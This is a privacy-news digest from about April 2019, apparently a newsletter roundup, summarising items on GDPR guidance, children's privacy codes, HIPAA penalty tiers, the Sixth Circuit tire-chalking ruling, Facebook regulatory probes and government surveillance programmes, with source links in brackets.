According to recent work by Kaspersky Lab, one in three consumers lack the knowledge or tools to fully protect their privacy online [see blog post]. The industry has started calling this “privacy fatigue“, alluding to the constant stress that some people feel that third parties are exploiting their private information. Kaspersky Lab survey involved 11,887 participants who used the company’s software in 21 countries. Researchers found that 17% of individuals, or nearly one-in-five, have acknowledged that they’ve uploaded private information about themselves that shouldn’t really be in the public domain or have seen family members behave this way. Among children under 18, this figure rises to 22.3% or almost a quarter of the respondents. Privacy fatigue affects 32.2% of the respondents who claim that they don’t know how to fully protect their privacy online and are stressed by this fact. One in ten people says they have lost interest in how they can further improve their privacy. Kaspersky found that a fifth of the survey’s participants did not make any effort — such as clearing browsing history or using VPNs [wiki here] — in order to secure their privacy. When they became aware of personal data misuse, more than a third (36%) of those affected felt stressed when it happened. One in five (21%) said they experienced monetary loss and a quarter (25%) were disturbed by spam and adverts. Kaspersky recommends following these simple steps in order to secure your digital privacy: 1)Start managing your digital footprint: keep a list of your accounts and regularly check if your data has become publicly accessible. Create a secondary email too; 2) Use special digital tools that allow surfing the internet safely, like Private Browsing or detecting any webcam or mic access by untrusted apps; and 3) Install reliable security solutions that include a set of utilities to minimize the risks of privacy violation. [ZME Science]

WW – Apple Removes Some Parental Control Apps Over Privacy Concerns

In a company blog post, Apple explains why it removed several parental control apps from its App Store. Apple said, “we did it for a simple reason: they put users’ privacy and security at risk.” A number of the apps in question used Mobile Device Management technology, something Apple characterizes as highly invasive technology. “MDM gives a third party control and access over a device and its most sensitive information including user location, app use, email accounts, camera permissions, and browsing history,” Apple stated. Though MDM has some legitimate uses, including as an installation for enterprise devices, the technology can be “incredibly risky” and violates Apple’s App Store policies. [Apple]

EU Developments

EU – European Parliament Highlights Data Protection Achievements from 2014–19 Term

Honoring a request from the Committee on Civil Liberties, Justice and Home Affairs, the European Parliament released a briefing that covered the “personal data protection achievements” it reached during the 2014–19 term. Parliament cited the EU General Data Protection Regulation, Regulation 2018/1725 and the adequacy decisions it reached as some of the accomplishments it made over the five-year period. “Parliament has played a key role in shaping EU legislation in the field of personal data protection by making protecting privacy into a political priority,” the briefing states. “An almost complete overhaul of the EU personal data protection rules has taken place during the current legislative term.” [Statewatch]

EU – EDPB Issues Guidelines on Contract as a Legal Basis for Processing

The European Data Protection Board (EDPB) has published draft guidelines on the “processing of personal data under the contractual legal basis in the context of the provision of online services to data subjects” [see 14 pg PDF here]. The guidelines notably seem to object to a digital agreement where services are exchanged for personal data. Moreover, these guidelines, even though restricted to an online agreement, can also be applied more generally to many other situations where GDPR Article 6(1)(b) is used as a legal basis in the offline world. These guidelines are currently open to consultation. [This blog post describes the following aspects of the guidelines]:

1)      Scope of the Guidelines: Agreements for Online Services – The guidelines relate to a specific category of agreements, meaning those under which data subjects are provided “online services”, or access to platforms that do not require a direct payment from the users but are financed by targeted advertising instead;

2)      Choosing the Relevant Legal Basis – In relation to such services, the most obvious legal basis would be consent, legitimate interest or contract, the latter being the subject matter of the guidelines;

3)      The Necessity Test – For EDPB, the essential question that a controller has to address is: “Is the processing of data genuinely and objectively necessary for the performance of the contract/or in order to take pre-contractual steps at the request of a data subject?”;

4)      EDBP’s Guidance Questions and Examples – An assessment should be made before the start of the processing activity, based on four questions:

  1. a) “What is the nature of the service?;
  2. b) What is the exact rationale of the contract?;
  3. c) What are the essential elements of the contract?; and
  4. d) What are the mutual perspectives and expectations of the parties to the contract?

It is important that stakeholders review these guidelines carefully and submit their views or arguments in the consultation process, where necessary, by 24 May 2019. [Security & Privacy // Bytes (Squire Patton Boggs) | EDPB guidelines on processing personal data under GDPR, Article 6(1)(b)

UK – ICO Bans Use of ‘Nudge Techniques’ in New Draft Guidelines

The U.K. Information Commissioner’s Office has published draft guidelines on the protection of children’s privacy when they use online services. In the guidelines, the ICO bans the use of “nudge techniques” in order to launch further engagement, such as Facebook’s “like” button or “streaks” within the Snapchat app. Violations of the draft guidelines would result in penalties under the EU General Data Protection Regulation. “Reward loops or positive reinforcement techniques (such as likes and streaks) can also nudge or encourage users to stay actively engaged with a service, allowing the online service to collect more personal data,” the ICO report states. The agency has launched a consultation for its new code of practice and will accept comments until May 31. [Financial Times]

EU – CNIL Releases Report on UX/UI Design and Data Protection

The CNIL’s digital innovation laboratory, the LINC, released a report titled “Shaping Choices in the Digital World.” The report looks at the use of dark patterns, offers policy recommendations, and proposes avenues for professionals to collaborate on privacy-friendly design practices. “It addresses the entire digital ecosystem by giving some operational recommendations to strengthen the control and choice to which users are entitled,” former CNIL President Isabelle Falque-Pierrotin writes in the report. “The CNIL intends to participate in this and considers the attention taken with design solutions as a potential framework on which to build its legal and technical expertise and better fulfil its mission to protect freedoms.” [CNIL.fr]

Facts & Stats

US – Only 4/10 Privacy Execs Confident in Ability to Keep Up With New Regs

A study conducted found only 4 in 10 privacy executives feel confident in their organizations’ ability to keep up with new regulations. Privacy executives listed “adapting to a volatile regulatory environment,” “establishing a privacy strategy to support digital transformation” and “implementing an effective third-party risk management program” as three of their top priorities for 2019. “Strategic and regulatory flexibility will be critical to the success of privacy functions this year,” Gartner Managing Vice President Brian Lee said. “Organizations still feeling the full force of complying with Europe’s General Data Protection Regulation are now being asked to adapt to additional regulatory requirements, which can impact both short- and long-term strategy.” [Gartner Group]

Filtering

UK – Adult Website Ban for UK Minors Begins July 15

The ban on underage access to pornographic websites will go into effect in the U.K. July 15. The new mandate, which is part of the Digital Economy Bill that was passed by Parliament in 2017, will require porn sites to verify that a user is over the age of 18 before allowing access. While the bill does not include privacy rules for the misuse of user information, individuals will still be protected under the EU General Data Protection Regulation. [Ars Technica]

Genetics

US – Why Sperm Donor Privacy is Under Threat from DNA Sites

When sperm donors join clinics, their critical right to privacy has always been guaranteed. But that right is being smashed by the rise of DNA tracking services like Ancestry.com and 23andMe, as people turn to the services to track down their biological relatives. That’s according to professor Guido Pennings, professor of ethics and bioethics at Ghent University in Belgium, who claimed in a paper that “searches through genetic databases jeopardize the privacy of people who did and did not register on them.” [Forbes]

Health / Medical

US – HIPAA Penalty Caps to Be Reduced and Tied to Culpability Level

In a dramatic turn, the US Department of Health and Human Services (HHS) has announced that effective immediately, penalties for many HIPAA violations will be subject to substantially reduced limits. After a record year of collecting high-dollar settlements, the agency has pulled back and tied its own hands through a Notification of Enforcement Discretion [see Federal Register here & PDF] that will likely result in lower penalties and settlement agreement amounts. Under the HITECH Act of February 2009 [see here & wiki here], Congress strengthened HHS’s HIPAA enforcement authority by authorizing increased minimum and maximum potential Civil Monetary Penalties (CMPs) for HIPAA violations. The HITECH Act established four culpability tiers for HIPAA violations:

1)      the person did not know (and, by exercising reasonable diligence, would not have known) that the person violated the provision;

2)      the violation was due to reasonable cause, and not willful neglect;

3)      the violation was due to willful neglect that is timely corrected; and

4)      the violation was due to willful neglect that is not timely corrected.

Prior to this recent exercise of “enforcement discretion” the Department interpreted the HITECH Act to allow an annual limit of $1.5 million per HIPAA violation per year, regardless of the level of culpability. The Notification of Enforcement Discretion states that upon further review, HHS has determined that a “better reading” of the HITECH Act is to apply tiered annual limits, ranging from $25,000 to $1.5 million, depending on the level of culpability. In light of this new determination, and as a matter of its enforcement discretion, HHS is announcing revised annual CMP limits for HIPAA violations with the expectation to codify the new interpretation as part of a future rulemaking process. HHS will use this new penalty tier structure going forward for all HIPAA enforcement actions The significantly reduced annual limits for HIPAA violations—other than those due to uncorrected willful neglect—will likely bring into focus levels of culpability in the enforcement process. A renewed focus on culpability provides incentives for covered entities and business associates to demonstrate good faith compliance efforts, so that any enforcement action would be subject only to the lower penalty tiers. In fact, under the new framework, organizations have significant financial incentives to correct potential “Willful Neglect” violations in a timely manner, to avoid the penalties associated with the highest tier. [Chronical of Data Protection (Hogan Lovells) | HIPAA Penalties Change Under HHS Notice of Enforcement Discretion]

US – Study: Mental Health Apps Share Personal Data Without User Knowledge

A recent study reveals that free smartphone apps for people dealing with depression or those seeking to quit smoking are sharing user data without informing or consulting users. The study, published in “JAMA Network Open 2019,” reveals that 33 of 36 health apps, which are available on Android and iOS app stores, shared user information that could reveal online behaviors to advertising and data analytics companies. Twenty-nine of the 36 apps transmitted data to Facebook and Google for marketing purposes while less than 50% of those companies disclosed sharing practices in their privacy policies. Some apps shared information, such as health diary entries, self reports about substance use, and usernames, the report states. [The Verge]

Intellectual Property

US – Cardozo Offers First Online Master’s in Data and Privacy Law for Non-Lawyers

New York City based Yeshiva University Benjamin N. Cardozo Law School [here & wiki here] is launching what it says is the first master’s degree in data and privacy law offered by a law campus. The goal of the program is to give non-lawyers a foundation in data and privacy law so that they can ensure their companies are compliant with the latest regulations. The school is hoping to attract information security professionals, IT managers, small business owners, tech entrepreneurs and paralegals to the program. The degree can be completed in 18 to 24 month with almost all coursework done online. The degree costs $38,850. A pilot cohort of six students started in the online program last fall, and the Manhattan school is expanding the Master of Studies in Law in Data and Privacy this fall in a new collaboration with online learning provider Noodle Partners [here] with the hope to enroll about 20 students. Applications for the fall class are open. Professor Felix Wu [here] said Cardozo’s program is different from existing cybersecurity masters programs offered by law schools, which tend to focus more on global cybersecurity issues and policy. “We’re really focused on trying to think of this from the perspective of individual companies needing to figure out how best to comply with all these developing standards,” he said. “The focus is much more on what you might regard as the more day-to-day aspects of governing data, as opposed to the global aspects of cybersecurity issues.” [New York Law Journal (Law.com)]

Internet / WWW

US – NIST Seeks Feedback for Privacy Framework Discussion Draft

The U.S. National Institute of Standards and Technology has started to accept feedback on the recently released discussion draft for its privacy framework. NIST seeks feedback on whether the privacy framework can be implemented with the structure of the “Framework for Improving Critical Infrastructure Cybersecurity,” as well as its coverage of privacy risk management and the informative references found within the document. “In general, NIST is interested in whether the Privacy Framework as proposed in this discussion draft could be readily usable as part of an enterprise’s broader risk management processes and scalable to organizations of various sizes — and if not, how it could be improved to suit a greater range of organizations,” the agency wrote in the announcement. [FNIST.gov]

Law Enforcement

CA – Nova Scotia Orders Moratorium on Street Checks Across Province

Justice Minister Mark Furey ordered a provincewide moratorium on identity checks of pedestrians and passengers in motor vehicles but stopped short of permanently banning the controversial police tool or offering a formal apology to African Nova Scotians [see PR & guidance]. The move comes 21 days after a human rights report that recommended banning or strictly regulating street checks in the province. In the report University of Toronto criminologist Scot Wortley found black Nova Scotians were stopped and questioned by police six times more frequently than whites and the controversial practice has “contributed to the criminalization of black youth, eroded trust in law enforcement and undermined the perceived legitimacy of the entire criminal justice system.” [see notice & press conference video here, 186 pg PDF Street Checks Report – Nova Scotia Human Rights Commission, and news coverage here] Furey, a former police officer, maintained his view that police checks are a valuable policing tool when used with discretion. Rather than opting for a permanent ban he chose a temporary halt to carding while a stakeholder committee works to adopt several recommendations from Wortley’s report and ultimately comes up with regulations on street checks. [The ChronicleHerald (Halifax) | Halifax police commission pushes for suspension of street checks | Halifax police board recommends suspension of street checks, calls for apology]

US – Court Rules Tire ‘Chalking’ Unconstitutional

A federal appeals court ruled this week that marking car tires is unconstitutional, deemed a violation of your Fourth Amendment rights against unwarranted searches and seizures. For years traffic enforcement officers have marked car tires with chalk to see when they check back if a car has moved. Saginaw, Mich. Local resident Alison Taylor took the city to court after receiving more than a dozen citations in a year, alleging a local parking enforcement officer, Tabitha Hoskins, named defendant alongside the city in the case, was violating her constitutional rights. The city initially won, but the U.S. Sixth Circuit Appeals Court reversed the decision, saying that chalking is a form of trespass that requires a warrant, similar to attaching a tracker to a car to monitor its real-time location, according to the court’s ruling. While the Fourth Amendment generally protects Americans from law enforcement searching your house or devices without a court-approved warrant to obtain evidence of a crime. In this case the court found that the parking enforcement officer trespassed on Taylor’s car “because the City made intentional physical contact with Taylor’s vehicle” the chalking was an “attempt to find something or to obtain information” from the car — albeit in a low-tech way — specifically to determine if the vehicle has “been parked in the same location for a certain period of time.” Nathan Freed Wessler, senior staff attorney with the ACLU’s Speech, Privacy, and Technology project is worried that the legal precedent could lead to the adoption of more privacy-invasive technologies instead. Some cities are already using more advanced technologies like automatic license plate recognition (ALPR) [wiki here] systems to scan plates to see if a vehicle has moved from one place to another. ALPR remains controversial but arguably still legal at the federal level — even if these plate scanners have faced challenges at the local level. [TechCrunch | Court Rules Chalking Parked Car Tires Violates Fourth Amendment | Here’s Why Police Using Chalk Marks On Your Tires To Write Tickets Violates The 4th Amendment | Lose the Chalk, Officer: Court Finds Marking Tires of Parked Cars Unconstitutional]

US – ODNI, NSA Publish ‘Statistical Transparency Report’

The U.S. Office of the Director of National Intelligence and the National Security Agency have released the sixth edition of the “Statistical Transparency Report Regarding Use of National Security Authorities.” The report offers a review of the use of warrants and law enforcement activities under the Foreign Intelligence Surveillance Act of 1978. This year’s report shows 9,637 warrantless queries were made for U.S. citizen communications data from NSA databases in 2018. The number of queries is up from 7,512 in 2017. The report also reveals the number of foreign organizations or individuals that were targeted under Section 702 of FISA jumped from 129,080 to 164,770, while the number of U.S. phone call records collected dropped by nearly 100 million. [ZD Net]

Online Privacy

WW – Facebook Hit With Three Privacy Investigations in a Single Day

Facebook was hit Thursday by a trio of investigations over its privacy practices. First came a probe by the Irish data protection authority [here] looking into the breach of “hundreds of millions” of Facebook and Instagram user passwords that were stored in plaintext on its servers. The company will be investigated under the European GDPR data protection law [here & wiki here], which could lead to fines of up to four percent of its global annual revenue for the infringing year — already some several billions of dollars. Then the Office of the Privacy Commissioner of Canada said it plans to take Facebook to federal court to force the company to correct its “serious contraventions” of Canadian privacy law [see OPC PR, report #2019-002, info chart & Commissioner’s comments]. The findings came in the aftermath of the Cambridge Analytica scandal, which vacuumed up more than 600,000 profiles of Canadian citizens. [watch full news conference & questions] Lastly, New York attorney general Letitia James announced she is looking into the recent “unauthorized collection” of 1.5 million user email addresses, which Facebook used for profile verification, but inadvertently also scraped their contact lists [see AG’s PR here]. You might think a trifecta of terrible news would be crushing for the social network. Alas, its stock is up close to 6 percent at market close, adding some $40 billion to its value. [TechCrunch | Ireland – Data Protection Commissioner to investigate Facebook over password storage | Canada – Privacy watchdog taking Facebook to court, says company breached privacy laws | New York – Facebook’s Email-Harvesting Practice Is Under Investigation in N.Y.]

WW – How Data Inference Technology Exposes Privacy-Minded Users

In an op-ed, Zeynep Tufekci explains how “data inference” technology is used to uncover information on even the most privacy-conscious online users. Due to the abundance of data on billions of other people on the internet, she points out that a user’s discretion is no longer enough to guarantee online privacy. Highlighting recent examples proving tech’s ability to ascertain user data from others, Tufekci suggests phones and devices should be designed to be more privacy-protected from the start and urges that legislation be introduced to address computational inference. [The New York Times]

Privacy (US)

US – Facebook Expects to be Fined Up to $5 Billion by F.T.C. Over Privacy Issues

Facebook said on Wednesday that it expected to be fined up to $5 billion by the Federal Trade Commission for privacy violations. The penalty would be a record by the agency against a technology company and a sign that the United States was willing to punish big tech companies. The social network disclosed the amount in its quarterly financial results, saying it estimated a one-time charge of $3 billion to $5 billion in connection with an “ongoing inquiry” by the F.T.C. Facebook added that “the matter remains unresolved, and there can be no assurance as to the timing or the terms of any final outcome.” [The New York Times — Additional coverage at The Wall Street Journal here & The Washington Post here]

US – FTC Hearings #12: The FTC’s Approach to Consumer Privacy Day 1: April 9

The FTC held its 12th Hearing on Competition and Consumer Protection on April 9 and 10, 2019. The overall theme of the two-day hearing centered on the FTC’s approach to consumer privacy [see FTC hearings schedule & DCP blog posts on all the hearings]. FTC Chairman Simons presented opening remarks emphasizing the positives and negatives of data collection stating that “we live in an age of technological benefits powered by data.” He made clear we need to evaluate our approach to privacy in a shifting world. [Watch first day of the hearings: session 1; and session 2] Panel 1 – Goals of Privacy Protection — The first panel began with moderator James Cooper, Deputy Director for Economic Analysis at the FTC presenting three key questions: 1) What do consumers want?; 2) Is there some reason firms aren’t responding?; and 3) Is there something the government can do to improve things? As well as the “privacy paradox”, whether the government should take action or not, and what harm any privacy regulation should be directed at. Responding panelist included: Neil Chilson, Senior Research Fellow for Technology and Innovation at the Charles Koch Institute; Paul Ohm, Professor of Law at Georgetown University; Alastair Mactaggart, Chairman of Californians for Consumer Privacy. Panel 2 – The Data Risk Spectrum: From De-Identified Data to Sensitive Individually Identifiable Data — Jules Polonetsky, CEO of the Future of Privacy Forum gave a presentation on de-identification. and Michelle Richardson, the Director of the Data and Privacy Project at the Center for Democracy and Technology (CDT), spoke about CDT regulation recommendations for de-identification and data protection. Rresponding panelists included: Aoife Sexton, Chief Privacy Office of Trūata; Deven McGraw, General Counsel and Chief Regulatory Officer at Ciitizen; and Shane Wiley, Chief Privacy Officer at Cuebiq. Panel 3 – Consumer Demand and Expectations for Privacy — started out with the question of whether there are consumer expectations and demands relevant to creating a privacy policy. [Panellists included]: Laura Pirri, Senior Legal Director and Data Protection Officer at Fitbit; Heather West, Senior Policy Manager at Mozilla; Lorrie Faith Cranor, Professor of Computer Science, Engineering, and Public Policy at Carnegie Mellon University; Ariel Fox Johnson, Senior Counsel of Policy and Privacy at Common Sense; Jason Kint, CEO of Digital Content Next; Avi Goldfarb, Professor of Marketing and Rotman Chain in Artificial Intelligence and Healthcare at the University of Toronto. Panels 4 and 5 – Current Approaches to Privacy — The day concluded with a double panel examining current approaches to regulating privacy, primarily focused on the European General Data Protection Regulation (GDPR), the California Consumer Privacy Act (CCPA), and existing US federal privacy laws and enforcement. Professor Margot Kaminski, University of Colorado Law, began the panel with an overview of these laws and set out a taxonomy of the key features and differences between modern privacy regimes: 1) Consumer protection vs. data protection regimes; 2) Omnibus vs. sectoral regimes; 3) Notice and choice vs. ‘something else’ regimes; 4) Individual rights vs. compliance regimes; and 5) Hard law vs. soft law regimes … Panelists then discussed the goals of privacy legislation and the virtues and shortcomings of the GDPR and CCPA in context of the consumer rights, corporate obligations, and enforcement mechanisms that should characterize a new US federal baseline privacy regime. [Disruptive Competition Project]

US – FTC Hearings #12: The FTC’s Approach to Consumer Privacy Day 2: April 10

The FTC held its 12th Hearing on Competition and Consumer Protection on April 9 and 10, 2019. The overall theme of the two-day hearing centered on the FTC’s approach to consumer privacy [see FTC hearings schedule & DCP blog posts on all the hearings]. [Watch the second day of the hearings: session 1; and session 2] Panel 1 – Role of Notice and Choice — The question presented for discussion was “When we refer to notice and choice in the privacy context, what do we mean?” Responding panellists included: Jordan Crenshaw, Assistant Policy Counsel of the Chamber Technology Engagement Center at the US Chamber of Commerce; Pam Dixon, Founder and Executive Director of the World Economic Forum; Katherine Tassi, Deputy General Counsel, Privacy and Product at Snap Inc.; Florencia Marotta-Wurgler, Professor of Law at New York University; Rachel Welch, Senior Vice President of Policy and External Affairs at Charter Communications; and Neil Richards, Koch Distinguished Professor of Law at Washington University in St. Louis. Panel 2 – Role of Access, Deletion, and Correction – Moderators kicked off the panel with this question: “What do you see as the goals for giving consumers access, rights to delete, correct, and port data, especially these days where there are complicated data systems involving artificial intelligence (AI) and big data?” Panel respondents included: Chris Calabrese, Vice President of Policy for the Center for Democracy and Technology; Jennifer Barrett Glasgow, Executive Vice President of Policy and Compliance at First Orion; Katie Race Brin, Chief Privacy Officer at 2U Inc.; Gus Rossi, Global Policy Director at Public Knowledge; Jonathan D. Avila, Vice President and Chief Privacy Officer at Walmart; Ali Lange, Senior Public Policy Analyst at Google. Panel 3 – Accountability — began with a discussion on how accountability differs from other approaches to consumer privacy and what accountability really means to a layperson; [Panellists included] Martin Abrams, Executive Director and Chief Strategist of the Information Accountability Foundation; Ari Ezra Waldman, Professor of Law at New York Law School; Karen Zacharia, Chief Privacy Officer at Verizon; Corynne McSherry, Legal Director of the Electronic Frontier Foundation; Mark Hintze, Partner at Hintze Law PLLC. Panel 4 – Is the FTC’s Current Toolkit Adequate? Part 1 — began with the difficult question of how to evaluate the success of the agency’s privacy enforcement activities. [Panellists included]: Marc Groman, Groman Consulting Group LLC; Christine Bannan, Electronic Privacy Information Center; Jane Horvath, Apple; Professor Peter Swire, Georgia Institute of Technology; Stuart Ingis, Venable; Jon Leibowitz, Davis Polk. Panel 5 – Is the FTC’s Current Toolkit Adequate? Part 2 — began with a discussion of whether the agency could do more with its existing authority. Panellists included: Professor David Vladeck, Georgetown University Law Center; Justin Brookman, Consumer Reports; Berin Szóka, President of TechFreedom; former FTC Commissioner Julie Brill, now at Microsoft; David Hoffman, Intel. [Disruptive Competition Project]

US – Facebook Poised to Fight Disclosure of U.S. Privacy Assessments

Facebook Inc. will seek to block disclosures from years’ worth of privacy reports it submitted to the U.S. Federal Trade Commission, according to filings in an Electronic Privacy Information Center FOIA lawsuit seeking the release of information in the documents [see background, EPIC’s original 12 pg PDF Complaint filed with the US District Court in D.C. & FTC’s 9 pg PDF Answer to the court] Facebook told the FTC and EPIC of its plans during an April 9 conference call. The judge gave Facebook until May 3 to file. As part of a 2011 settlement [see FTC PR here, 10 pg PDF 2011 consent decree here & 9 pg PDF 2012 consent order here] settling charges that Facebook deceived users when it said they could keep their data private, the company had to submit to privacy assessments every other year for 20 years to document that it had enough controls to protect user data. Facebook hired PricewaterhouseCoopers LLP to conduct the reviews. In three reports that the FTC has made public [access PDF reports & docs], with dozens of pages blanked out, PwC concluded the privacy program was working. Questions about the accuracy and thoroughness of those checkups have arisen amid a string of scandals and missteps in how the world’s largest social media site has been handling user data. “Is there something hidden in the audits that we can’t see that explains the other things that we now know about?” said Alan Butler, a senior counsel at EPIC, referring to Facebook’s repeated privacy scandals. “Or is there some problem in the audits and the audit process?” Facebook and PwC declined to comment. The FTC didn’t immediately respond to requests for comment. EPIC is challenging redactions of the privacy audits that the FTC made under measures designed to protect business and trade secrets. The group can argue that an agency has failed to show that releasing the information would cause “competitive harm,” Butler said. It’s not always easy to say whether an agency should treat business information as confidential, particularly with respect to privacy protections, which some tech companies now view as part of their competitive value, said Alysa Hutnik, who chairs the privacy practice at Kelley Drye & Warren LLP. She said Facebook may seek to postpone the case because a dispute over similar issues is headed to the Supreme Court. [Bloomberg]

RFID / IoT

US – NIST Accepting Comments on IoT Draft Document

The U.S. National Institute of Standards and Technology and the National Cybersecurity Center of Excellence announced they will accept comments on the draft “Securing Small-Business and Home Internet of Things (IoT) Devices: Mitigating Network-Based Attacks Using Manufacturer Usage Description (MUD)“ document until June 24. The groups ask internet-of-things device manufacturers whether they have a better understanding to implement “manufacturer usage descriptions” into their products. Network equipment manufacturers are asked if they would consider MUD in their offerings, while communication service providers are prompted to reveal whether the guide helped in “understanding how wide deployment of MUD could help reduce distributed denial-of-service attacks.” [NCCOE]

Security

CA – Security Startup to Give High-Tech Scanners Test Run at Rogers Arena

The next generation of high-tech security scanners will use advanced radar, 3D imaging and AI to unobtrusively screen sports fans, and the people entering Rogers Arena could be early test subjects for one company’s bid to enter the field. If all the pieces fall into place, Liberty Defense Technologies, a Vancouver-headquartered startup with an engineering lab in Atlanta, will have a prototype of what it’s calling HEXWAVE technology [watch short explanatory videos here & here] ready by the summer for initial testing in the lab, then beta-testing with security teams at venues, such as Rogers Arena, after that. HEXWAVE scanners operate from pairs of 60-centimetre-by-two-metre panels that transmit and receive low-powered radar waves that generate images with high enough resolution to discern the difference between a benign object such as a cellphone or a threat such as a gun or a pipe bomb. The images are analyzed via artificial intelligence, which alert security when a threat is detected, and Riker said it will be able to do so in real time as people walk through, unlike existing scanners that require subjects to stop as a device sweeps around them and physical checks that are cumbersome and time-consuming. Canucks Sports and Entertainment owner Francesco Aquilini is an adviser to Liberty Defense and has signed a memorandum-of-understanding to use the arena as a test site, which the companies will be announcing April 15 [read PR here]. [Vancouver Sun| Rogers Arena to test new concealed-weapons detection technology]

CA – Canadian Cops Will Scan Social Media to Predict Who Could Go Missing

Documents obtained by Motherboard from Ontario’s Ministry of Community Safety and Correctional Services (MCSCS) through an access to information request show that … Police, social services, and health workers in Canada are using shared databases to track the behaviour of vulnerable people—including minors and people experiencing homelessness—with little oversight and often without consent. At least two provinces—Ontario and Saskatchewan—maintain a “Risk-driven Tracking Database” that is used to amass highly sensitive information about people’s lives [see access platform here]. Information in the database includes whether a person uses drugs, has been the victim of an assault, or lives in a “negative neighborhood.” The Risk-driven Tracking Database (RTD) is part of a collaborative approach to policing called the Hub model that partners cops, school staff, social workers, health care workers, and the provincial government. Information about people believed to be “at risk” of becoming criminals or victims of harm is shared between civilian agencies and police and is added to the database when a person is being evaluated for a rapid intervention intended to lower their risk levels. Interventions can range from a door knock and a chat to forced hospitalization or arrest. Data from the RTD is analyzed to identify trends—for example, a spike in drug use in a particular area—with the goal of producing planning data to deploy resources effectively, and create “community profiles” that could accelerate interventions under the Hub model, according to a 2015 Public Safety Canada report. Saskatchewan and Ontario officials say data in the RTD (sometimes called the “Hub database” in Saskatchewan) is “de-identified” by removing details such as people’s names and birthdates, though experts Motherboard spoke to said that scrubbing data so it may never be used to identify an individual is difficult if not impossible. A Motherboard investigation—which involved combing through MCSCS, police, and city documents—found that in 2017, children aged 12 to 17 were the most prevalent age group added to the database in several Ontario regions, and that some interventions were performed without consent. In some cases, children as young as six years old have been subject to intervention. Particularly concerning for privacy advocates is the possibility that the RTD is being used for the purposes of predictive policing—a controversial strategy that employs data analysis to identify hot spots for crime. A report produced by Public Safety Canada in 2015 notes that data gathered during Hub discussions can be used to help “identify and plan predictive risk patterns at local, regional, and provincial levels.” The information in the RTD can help to accelerate interventions in some communities, the report states. Critics say that predictive models will lead to false positives and could disproportionately affect vulnerable communities. [The remainder of this long 2500 word article examines the following]: 1) How does people’s information get added to the database?; 2) What’s in the database?; and 3) Predictive policing concerns. [Motherboard | RCMP’s Social Media Surveillance Symptom of Broad Threat to Privacy, Says BCCLA | ‘Project Wide Awake’: How the RCMP Watches You on Social Media | Police in Canada Are Tracking People’s ‘Negative’ Behavior In a ‘Risk’ Database | The Canadian Government Is Going to Scan Social Media to See If You Smoke Pot | Academics Confirm Major Predictive Policing Algorithm is Fundamentally Flawed | Canada’s ‘Pre-Crime’ Model of Policing Is Sparking Privacy Concerns

Smart Cities

CA – CCLA sues Canadian Governments over Sidewalk Labs

The Canadian Civil Liberties Association has filed a lawsuit against all three levels of the Canadian government over the Waterfront Toronto smart-city project. The CCLA seeks court orders to terminate the agreement between Sidewalk Labs and Waterfront Toronto. The group has also pushed for a declaration that states Waterfront Toronto, Ontario and the Canadian federal government violated citizens’ privacy rights under the Canadian Charter of Rights and Freedoms. “Sidewalk Labs fully supports a robust and healthy discussion regarding privacy, data ownership and governance,” Sidewalk Spokesperson Keerthana Rang said via email. “We look forward to submitting our proposal to Waterfront Toronto and to continuing to work with Torontonians to get this right.” [Motherboard]

Surveillance

US – United Airlines Blocks Seatback Cameras Amid Privacy Backlash

Following customer complaints about privacy concerns, United Airlines is covering up seatback cameras in all its aircrafts. Several airlines, including United, admitted that the cameras existed but were never going to be used. “None of these cameras were ever activated, and we had no plans to use them in the future; however, we took the additional step to cover the cameras. The cameras are a standard feature that manufacturers of the system included for possible future purposes such as video conferencing,” United Airlines Spokeswoman Andrea Hiller said. The privacy debate regarding the cameras came after a Singapore Airlines passenger discovered a camera on the seat in front of him. [USA Today]

US Government Programs

US – DHS Aims for More Airplane Facial Recognition by 2023

The U.S. Department of Homeland Security has laid out a four-year plan to have facial-recognition technology cover 97% of departing airplane passengers. DHS states in a report U.S. Customs and Border Protection can achieve its 2023 goal through partnerships with airports and airlines and with the expansion of the “Biometric Exit” program that cross-references images of departing passengers with previously stored images from visa and passport applications. While CBP reported the program identified 7,000 passengers with overstayed visas, privacy advocates argue the facial-recognition tech raises civil rights concerns regarding the information it collects. Meanwhile, the U.S. Federal Bureau of Investigation is under fire for ignoring government concerns about the privacy and accuracy standards of its facial-recognition technology. [The Hill]

US – CBP’s New Social Media Surveillance: A Threat to Free Speech and Privacy

U.S. Customs and Border Protection (CBP) released a required Privacy Impact Assessment (PIA) on March 27 for the social media monitoring it carries out as part of its new Situational Awareness Initiative. The release of the assessment may have come in response to a March 6 report from NBC7 in San Diego revealing that the U.S. government created a surveillance target list of “Suspected Organizers, Coordinators, Instigators and Media.” The list featured journalists, activists, social media influencers, and lawyers working on immigration issues [see recent coverage here] The list included names and photos of each individual – including 40 Americans and 19 others – as well as information on whether they had alerts placed on their passports and their connection to the migrant caravans traveling from Central America to the United States. Social media was clearly a source of information in curating the list – some of the photos were copied from social media profiles, and three people were described as “administrator on caravan support Facebook page.” According to the PIA, as part of the initiative, CBP continuously monitors social media sites using web-based platforms and other tools in order to provide awareness of breaking news, “natural disasters, threats of violence, and other harmful events.” The surveillance target list seems to have been part of these “situational awareness“ efforts, though given the lack of transparency surrounding the department’s various surveillance programs, we cannot know for certain. CBP’s use of automated tools further muddles what gets categorized as “dangerous or threatening.” As numerous empirical studies have proven, automated tools have trouble correctly interpreting social media posts due to the context-dependent nature of social media and the frequent use of humor, sarcasm, and non-standard language. Tools with the highest accuracy rates for English-language processing still misinterpret content 20% to 30% of the time. So, innocuous posts scooped up because they contain keywords like “immigration,” “terrorism,” or “border” may easily be misinterpreted and flagged as a threat. Situational awareness social media information containing all sorts of personal information may be stored in various DHS databases, though details are scant. The PIA only specifies that online posts containing “credible threats“ against particular CBP agents are stored in a system that mainly holds employee misconduct and disciplinary records. Considering that “credible threats” are likely only a small subset of situational awareness data, the lack of discussion of where the rest of the data is stored is a glaring omission. Additionally, CBP agents may use “situational awareness” information for “link analysis,” that is, identifying possible associations among data points, people, groups, events, and investigations. For link analysis, CBP agents first use CIRS to amass information about a huge number of individuals from social media and other public and governmental sources. Then, the analytical tools in another system, CBP’s Analytic Framework for Intelligence (AFI), are used to conduct link analysis on CIRS data to identify “non-obvious relationships“ between individuals or entities. Giving DHS’s ever-expanding intelligence apparatus carte blanche to monitor constitutionally-protected online activities that are either “pertinent” to broadly-defined law enforcement priorities or appear “threatening or dangerous” should never be “standard practice.” CBP’s efforts to map out the networks and activities of Americans through link analysis and social media monitoring pose a serious threat to the rights of free speech and association. [Just Security]

US – NSA Recommends Ending Phone-Records Program

